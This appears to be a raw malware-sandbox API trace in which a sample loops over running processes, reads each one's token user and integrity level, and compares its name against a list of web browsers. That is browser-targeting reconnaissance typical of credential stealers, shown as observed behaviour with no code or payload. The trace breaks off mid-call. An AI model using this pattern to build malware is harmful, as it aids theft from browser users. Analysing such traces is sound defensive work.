OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.550] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.550] GetLastError () returned 0x7a [0247.550] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.551] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.551] CloseHandle (hObject=0x114) returned 1 [0247.551] CloseHandle (hObject=0xbc) returned 1 [0247.551] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.551] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.551] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.551] GetLastError () returned 0x7a [0247.551] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.552] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.552] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.552] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0247.552] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0247.552] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0247.552] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0247.552] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0247.552] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0247.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xbc [0247.553] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.553] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.553] GetLastError () returned 0x7a [0247.553] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.553] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.553] CloseHandle (hObject=0x114) returned 1 [0247.553] CloseHandle (hObject=0xbc) returned 1 [0247.553] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.554] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.554] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.554] GetLastError () returned 0x7a [0247.554] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.554] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.554] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.554] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0247.554] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0247.554] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0247.555] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0247.555] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0247.555] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0247.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xbc [0247.555] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.555] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.555] GetLastError () returned 0x7a [0247.555] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.555] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.556] CloseHandle (hObject=0x114) returned 1 [0247.556] CloseHandle (hObject=0xbc) returned 1 [0247.556] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.556] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.556] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.556] GetLastError () returned 0x7a [0247.556] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.557] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.557] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.557] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.557] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0247.557] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.557] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.557] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.557] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0247.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xbc [0247.557] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.558] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.558] GetLastError () returned 0x7a [0247.558] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.558] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.558] CloseHandle (hObject=0x114) returned 1 [0247.558] CloseHandle (hObject=0xbc) returned 1 [0247.558] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.558] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.559] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.559] GetLastError () returned 0x7a [0247.559] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.559] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.559] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.559] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0247.559] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0247.559] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0247.560] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0247.560] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0247.560] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0247.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xbc [0247.560] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.560] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.560] GetLastError () returned 0x7a [0247.560] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.560] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.560] CloseHandle (hObject=0x114) returned 1 [0247.561] CloseHandle (hObject=0xbc) returned 1 [0247.561] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.561] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.561] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.561] GetLastError () returned 0x7a [0247.561] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.561] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.562] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.562] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.562] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0247.562] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.562] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.562] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.562] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0247.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xbc [0247.562] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.562] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.563] GetLastError () returned 0x7a [0247.563] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.563] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.563] CloseHandle (hObject=0x114) returned 1 [0247.563] CloseHandle (hObject=0xbc) returned 1 [0247.563] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.564] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.564] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.564] GetLastError () returned 0x7a [0247.564] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.564] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.564] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.565] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.565] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0247.565] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.565] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.565] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.565] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0247.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xbc [0247.565] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.565] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.565] GetLastError () returned 0x7a [0247.566] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.566] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.566] CloseHandle (hObject=0x114) returned 1 [0247.566] CloseHandle (hObject=0xbc) returned 1 [0247.566] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.566] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.566] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.566] GetLastError () returned 0x7a [0247.567] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.567] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.567] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.567] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.567] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.567] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.567] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.567] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.567] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0247.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xbc [0247.567] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.567] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.568] GetLastError () returned 0x7a [0247.568] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.568] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.568] CloseHandle (hObject=0x114) returned 1 [0247.568] CloseHandle (hObject=0xbc) returned 1 [0247.568] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.568] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.568] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.568] GetLastError () returned 0x7a [0247.568] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.568] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.569] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.569] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0247.569] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0247.569] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0247.569] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0247.569] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0247.569] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0247.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xbc [0247.569] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.569] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.569] GetLastError () returned 0x7a [0247.569] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.569] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.570] CloseHandle (hObject=0x114) returned 1 [0247.570] CloseHandle (hObject=0xbc) returned 1 [0247.570] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.570] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.570] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.570] GetLastError () returned 0x7a [0247.570] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.570] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.570] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.570] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0247.570] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0247.570] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0247.571] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0247.571] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0247.571] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0247.571] OpenProcess 